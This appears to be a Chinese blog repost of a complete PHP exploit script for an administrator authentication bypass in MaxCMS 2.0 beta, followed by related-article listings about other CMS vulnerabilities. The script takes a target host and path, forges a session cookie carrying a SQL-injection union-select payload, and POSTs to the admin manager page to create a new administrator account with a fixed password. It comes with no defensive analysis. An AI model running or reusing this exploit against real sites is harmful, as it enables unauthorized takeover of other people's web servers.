马克斯cms转php,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞

最新推荐文章于 2024-02-19 17:26:48 发布
最新推荐文章于 2024-02-19 17:26:48 发布
阅读量480 收藏
点赞数
文章标签: 马克斯cms转php

<?php

print_r('

+---------------------------------------------------------------------------+

maxcms2.0 creat new admin exploit

by Flyh4t

team:wolvez security team

site:bbs.wolvez.org

dork:salemax#qq.com

+---------------------------------------------------------------------------+

');

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to maxcms

Example:

php '.$argv[0].' localhost /maxcms2/

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$name = rand(1,10000);

$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);

if (!eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}

print_r('

+---------------------------------------------------------------------------+

[+]cool,exploit seccuss

[+]you have add a new adminuser flyh4t'.$name.'/wolvez

+---------------------------------------------------------------------------+

');

function send($cmd)

{

global $host, $path;

$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: flyh4t\r\n";

$message .= "X-Forwarded-For:1.1.1.1\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

echo $message;

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

echo $resp;

return $resp;

}

?>

蜜桃公主Y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MaxSite CMS 代码问题漏洞(CVE-2022-25411)
千寻的博客
12-09 1948
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。
PHPMAXCMS
12-27
PHPMAXCMS,PHPMAXCMS
马克斯cmsphp,马克斯CMS(maxcms)
weixin_39600704的博客
03-16 387
马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序(MaxCMS)一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!马克斯CMS(maxcms)软件特色新闻管理系统马克斯CMS(maxcms)支持在线新闻管理,方便添加、删除,生成等操作!模板管理系统马克斯CM...
春秋云境:CVE-2022-25411(Maxsite CMS文件上传漏洞
m0_65712192的博客
04-22 1192
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。账户为弱口令。
maxcms2.0正式版下载-带采集功能
05-31
  马克斯程序(MaxCMS)以100%完全开源、永久免费、功能强大、安全健壮、性能卓越、超级易用、模板众多(150余套)、插件齐全(50多款)、资源丰富(15个FLV、P2P资源库每日手动更新)等优势,成为互联网影视程序的领头羊。影视行业中,马克斯程序(MaxCMS)市场占有率达90%以上、站点数目已超10万个,其中部分大型影视站日独立IP超30万、PV超过200万、月盈利近10万RMB。   马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队,马克斯站长交流论坛日发帖量稳定在1200以上,确保每一个免费用户得到实时的技术支持服务。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、使程序可在极少的服务器及带宽投入下快速稳定运行、节约网站成本、提升网站品质、帮助站长迅速盈利!   一键安装,一键采集, 一键生成 ,只需 3 分钟,您就可以搭建一个强大稳定的影视门户站! 演示地址:http://movie.51802.com
马克斯程序CMS4.0(MaxCms4.0)源代码
03-18
马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。 马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队...
马克斯CMS(maxcms)源代码
03-18
查看安装过程马克斯CMS(maxcms) v4.0 安装图文教程 马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。 2014.06.02更新记录 集成了4...
基于ASP的马克斯CMS v2.0 beta.zip
07-16
马克斯CMSMaxCMS)是一款基于ASP(Active Server Pages)技术构建的内容管理系统,适用于快速搭建网站,尤其适合中小企业和个人用户。ASP是一种微软公司开发的服务器端脚本环境,它允许开发者在网页上嵌入动态生成...
ASP源码—马克斯CMS v2.0 beta.zip
10-23
马克斯CMSMaxCMS)是一款基于ASP技术构建的内容管理系统,主要用于网站的搭建、管理和维护。V2.0 beta版本表明这是一个测试版,可能包含一些新功能或者改进,但同时也可能存在一些未解决的问题和漏洞。 在ASP源码...
光线cms马克斯MaxCMS影视系统调用吉吉影音替换快播播放器的方法
09-28
主要介绍了光线cms马克斯MaxCMS影视系统调用吉吉影音替换快播播放器的方法,本文内容要有一定的编程知识才可以操作,需要的朋友可以参考下
(F5电影系统v4.04)PHP马克斯程序-PHPMAXCMS
05-14
F5是一套采用php+mysql架构的CMS系统,凭借100%完全开源、永久免费、功能强大、安全健壮、性能卓越、超级易用、模板与马克斯CMS共用优势、深得中国互联网广大站长的一致好评,已完全成为互联网程序的领头羊。F5 V4.01功能与特色列表:         00.F5是一套与马克斯任何地方都一样的程序,后台有着强大的控制外,还在马克斯的基础上添加了视频和新闻首页热门SEO和说明控制! 01.丰富的模板及强大易用的标签  独创的HTML形式的标签机制,使得做模板非常简单,只要你会HTML就可以制作精美的模板皮肤。程序模板多达100余套,全部免费、任意下载使用,全站DIV+CSS模板标签设计
马克斯CMS(maxcms) v2.0 for sqlserver build 090614.rar
08-30
此次马克斯CMS2.0全新架构,速度性能都有极大提升 压缩里的标签文档为开发版文档,详细使用标签文档迟些会整理发出。 安装时默认是选的 站外 ,即不能连播,如果需要连播或是自动播放,请自己选站内。 请在IIS下调试,动态版请指定默认文档为index.asp,动态版是有缓存的,请修改过数据或是模板后在后台清除缓存然后前台看效果。 程序更新历史记录: 2009.06.14**11:51土豆播放器失效修正,/js/play.swf 2009.05.20**18:06增加标签[videolist:playlink],[channellist:playlink],{playpage:nolinkactor};内容也播放页以下标签增加长度控制{playpage:des}{playpage:nolinkactor} {playpage:name};修正后台自定义快捷菜单容错性;更新/admin/admin_makehtml.asp,/admin/admin_selfmenu.asp,/inc/mainclass.asp,commonfun.asp,/content/index.asp,/play/index.asp 2009.05.15**11:51修改sqlserver版的makeDatabase.asp,建空库时插入后台账号信息、便于登陆后台 2009.05.14**2:30发布sqlserver完整包 2009.05.12**22:10改进评论显示,剥离留言本样式与模板的关联,去除部分弹出层改为js的alert、便于用户操作,修正部分服务器上存在的google地图生成错误,更新文件gbook.asp,comment.asp,/js/function.js,/admin/admin_makehtml.asp 2009.05.07**13:31更新GVOD联播及缓冲下集、新浪高清播放器 2009.05.04**18:19更新2009新版资源库**台稳定版 2009.03.27**23:50改进程序易用性,修复图片采集bug,影片介绍为空生成错误解决,新浪高清更换播放器,改进后台添加下载地址等(因此次无必须功能升级,故未在后台更新提示) 2009.03.23**18:13增加影片seo关键字标签{playpage:note},更新文件/inc/CommonFun.asp,/inc/MainClass.asp,/play/index.asp,/content/index.asp,/admin/admin_makehtml.asp 2009.03.20**23:49增加远古高清和ku6的支持,更新文件/js/webplayer2008.html,/js/play.swf,/inc/playerKinds.xml,/admin/images/main.js 2009.03.20凌晨01:15更新自定义播放页是否生成 2009.03.17增加影片某一集名称标签{playpage:part},更新文件/play/index.asp 2009.03.17播放器支持gvod, 更新文件/js/play.swf , /js/gvod.html , /inc/playerKinds.xml , /admin/images/main.js , /admin/images/version.xml 2009.03.16修正新浪专辑采集问题,以及后台采集资源后时间更新问题,修改文件/admin/admin_resourcelib.asp,admin_webgather.asp 2009.03.07修正qvod播放器问题,修改了/js/play.swf,/js/play.js文件解决在IFRAME下播放问题
马克斯cmsphp,PHP CMS 换为 WordPress的技巧
weixin_39854326的博客
03-26 276
你可以将站点的这些数据表导出;你要换过去的是基本的一些字段,而不是其他很多的自增字段。也就是说,你仅仅为了将标题、内容等数据导出来,那么,没问题!PHPCMS换为Wordpress步骤和思路:预装Wordpress站点;将数据表导出来,导入到预装Wordpress的数据库中;用Mysql管理工具比如phpmyadmin登录数据库;架设phpcms的表前缀是“phpcms”,wordpress的...
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7047
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
【复现】Wuzhi cms后台sql注入漏洞_53
最新发布
fushuang333的博客
02-19 765
【复现】Wuzhi cms后台sql注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
春秋云境:CVE-2022-25411
一只爱吃橙子的羊
12-01 1635
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!独立开发的管理员管理系统,可以对管理员进行更能人性化的管理网站。 Maxsite CMS存在文件
Mysql5注射技巧总结
cnbird's blog
01-22 638
flyh4t@126.com文章已经发表在《黑客手册》,载请署名版权Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。一、原理分析我们先看看mysql5比之前增加的系统数据库information_schema的结构,
MAXCMS后台管理系统漏洞
08-15
我无法提供关于MAXCMS后台管理系统的具体漏洞信息,因为我不具备实时的安全漏洞数据库。然而,任何软件系统都有可能存在漏洞,包括MAXCMS。为了确保系统的安全性,建议您定期更新MAXCMS到最新版本,并遵循以下最佳...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值